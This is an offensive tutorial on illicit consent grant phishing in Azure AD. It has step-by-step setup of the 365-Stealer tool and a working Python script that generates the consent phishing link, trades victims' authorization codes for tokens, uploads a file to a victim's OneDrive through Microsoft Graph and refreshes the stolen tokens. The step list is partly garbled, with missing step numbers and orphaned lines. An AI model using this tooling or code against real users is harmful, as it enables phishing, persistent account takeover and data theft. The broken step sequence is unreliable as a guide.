
Illicit Consent Grant phishing

Illicit consent grant phishing tricks a user into granting an attacker-controlled Azure AD application delegated (OAuth) permissions to their data. The victim sees an ordinary Microsoft consent prompt for what looks like a legitimate application; once they click Accept, the attacker receives tokens that act on the victim's behalf without ever learning the password, and those tokens keep working even if the password is changed.

Here are the steps and commands involved in executing this attack:

1) Create an Application

Navigate to "Azure Active Directory" in the Azure portal.

Go to "App registrations" and click "New registration."

Set an application name and, under supported account types, choose "Accounts in any organizational directory" (multi-tenant) so that users from other tenants can consent to it.

Set the redirect URI to the URL of the phishing site (the host that will run 365-Stealer); Azure AD sends the authorization code there after the victim consents.

2) Create Client Secret

Go to "Certificates & Secrets" and create a new client secret.

Copy the generated client secret value immediately; it is displayed only once.

3) Add API Permissions

Go to "API permissions" and add delegated Microsoft Graph permissions such as User.Read and User.ReadBasic.All.

Import-Module AzureADPreview.psd1

Use an account from another tenant.

5) Setup the 365-Stealer

Link: https://github.com/AlteredSecurity/365-Stealer

Copy the 365-Stealer directory into the XAMPP web root (htdocs) so that Apache serves the phishing page.

Edit 365-stealer.py and set CLIENTID, REDIRECTEDURL, and CLIENTSECRET to the values from the app registration. REDIRECTEDURL must match the redirect URI registered in step 1 exactly, otherwise Azure AD refuses to issue the authorization code.

6) Start the 365-Stealer

Browse to https://localhost and click on "Read More". Copy the generated phishing link; it is the Azure AD authorize URL carrying the app's client ID, redirect URI, and requested scopes.

8) Enumerate Applications for Phishing

Edit the permutations.txt file to add the name permutations to try.

9) Get the Access Tokens

Browse to http://localhost:82/365-Stealer/yourvictims/ and copy the access token from the victim's access_token.txt.

If the attack needs permissions beyond those added in step 3 (the OneDrive upload in step 11 needs a Files permission such as Files.ReadWrite.All), add them to the app and grant admin consent.

11) Abuse the Access Token

Upload a Word document to the victim's OneDrive using the stolen access token, sent as a Bearer token to the Microsoft Graph API.

12) Refresh All Tokens

Use the Refresh All Tokens option to exchange the stored refresh tokens for new access tokens once the current ones expire (access tokens are valid for roughly an hour; refresh tokens require the offline_access scope).
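The following Python script is an added example that walks through what the steps above automate: building the consent (phishing) link of step 6, turning the authorization code delivered to the redirect URI into tokens (step 9), uploading a file to the victim's OneDrive over Microsoft Graph (step 11), and refreshing the access token (step 12). It is not 365-Stealer's code. The client ID, client secret, redirect URI and the victim values are placeholders, Files.ReadWrite.All is an assumed scope needed for the upload (the page itself lists only User.Read and User.ReadBasic.All), and the request builders return the request rather than sending it so the logic can be inspected and tested offline; send() performs the real HTTP call when network access is available.

```python
"""Illicit consent grant flow against Azure AD / Microsoft Graph (added example).

Placeholders (not real values): CLIENT_ID, CLIENT_SECRET, REDIRECT_URI.
"""
import json
import secrets
import urllib.parse
import urllib.request

AUTHORITY = "https://login.microsoftonline.com/common/oauth2/v2.0"  # 'common': any tenant may consent
GRAPH = "https://graph.microsoft.com/v1.0"

# Delegated scopes. User.Read and User.ReadBasic.All are the ones from step 3;
# Files.ReadWrite.All (assumed) is what the OneDrive upload in step 11 needs;
# offline_access makes Azure AD return a refresh token for step 12.
SCOPES = ["User.Read", "User.ReadBasic.All", "Files.ReadWrite.All", "offline_access"]

# Azure AD's simple upload (PUT .../content) is limited to files under 4 MB.
SIMPLE_UPLOAD_LIMIT = 4 * 1024 * 1024


def build_consent_url(client_id, redirect_uri, scopes=SCOPES, state=None):
    """Step 6: the phishing link that opens the Microsoft consent prompt."""
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "response_mode": "query",
        "scope": " ".join(scopes),
        "state": state or secrets.token_urlsafe(16),
    }
    return f"{AUTHORITY}/authorize?{urllib.parse.urlencode(params)}"


def extract_code(redirect_url, expected_state):
    """Parse ?code=...&state=... from the URL Azure AD redirected the victim to.

    A mismatched state means the callback did not come from a link we issued;
    an 'error' parameter means the victim declined (e.g. access_denied)."""
    q = urllib.parse.parse_qs(urllib.parse.urlparse(redirect_url).query)
    if "error" in q:
        raise ValueError(f"{q['error'][0]}: {q.get('error_description', [''])[0]}")
    if q.get("state", [None])[0] != expected_state:
        raise ValueError("state mismatch")
    return q["code"][0]


def code_for_token_request(client_id, client_secret, redirect_uri, code):
    """Step 9: POST body that trades the authorization code for tokens."""
    return {
        "method": "POST",
        "url": f"{AUTHORITY}/token",
        "headers": {},
        "data": {
            "grant_type": "authorization_code",
            "client_id": client_id,
            "client_secret": client_secret,
            "code": code,
            "redirect_uri": redirect_uri,  # must equal the registered redirect URI
            "scope": " ".join(SCOPES),
        },
    }


def refresh_request(client_id, client_secret, refresh_token):
    """Step 12: trade the refresh token for a new access token."""
    return {
        "method": "POST",
        "url": f"{AUTHORITY}/token",
        "headers": {},
        "data": {
            "grant_type": "refresh_token",
            "client_id": client_id,
            "client_secret": client_secret,
            "refresh_token": refresh_token,
            "scope": " ".join(SCOPES),
        },
    }


def onedrive_upload_request(access_token, filename, content):
    """Step 11: PUT a file into the root of the victim's OneDrive via Graph."""
    if "/" in filename or len(content) > SIMPLE_UPLOAD_LIMIT:
        raise ValueError("use a bare filename and a payload under 4 MB")
    return {
        "method": "PUT",
        "url": f"{GRAPH}/me/drive/root:/{urllib.parse.quote(filename)}:/content",
        "headers": {
            "Authorization": f"Bearer {access_token}",
            "Content-Type": "application/octet-stream",
        },
        "data": content,
    }


def send(req):
    """Send a request built above (needs network); returns the JSON response."""
    data = req["data"]
    if isinstance(data, dict):
        data = urllib.parse.urlencode(data).encode()
    r = urllib.request.Request(req["url"], data=data, method=req["method"], headers=req["headers"])
    with urllib.request.urlopen(r) as resp:
        body = resp.read()
    return json.loads(body) if body else {}


if __name__ == "__main__":
    # Placeholder registration values; print the link a victim would receive.
    print(build_consent_url("00000000-0000-0000-0000-000000000000", "https://localhost/365-Stealer/"))
```

The state parameter is what ties a returning authorization code to a link you issued; 365-Stealer keys victims by the account that consented, but in a hand-rolled flow you still want to reject callbacks whose state you never generated. Note that a token returned here carries only the scopes the victim actually consented to, so if Files.ReadWrite.All was not granted the upload in step 11 fails with 403 regardless of how the app is configured in the attacker's tenant.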
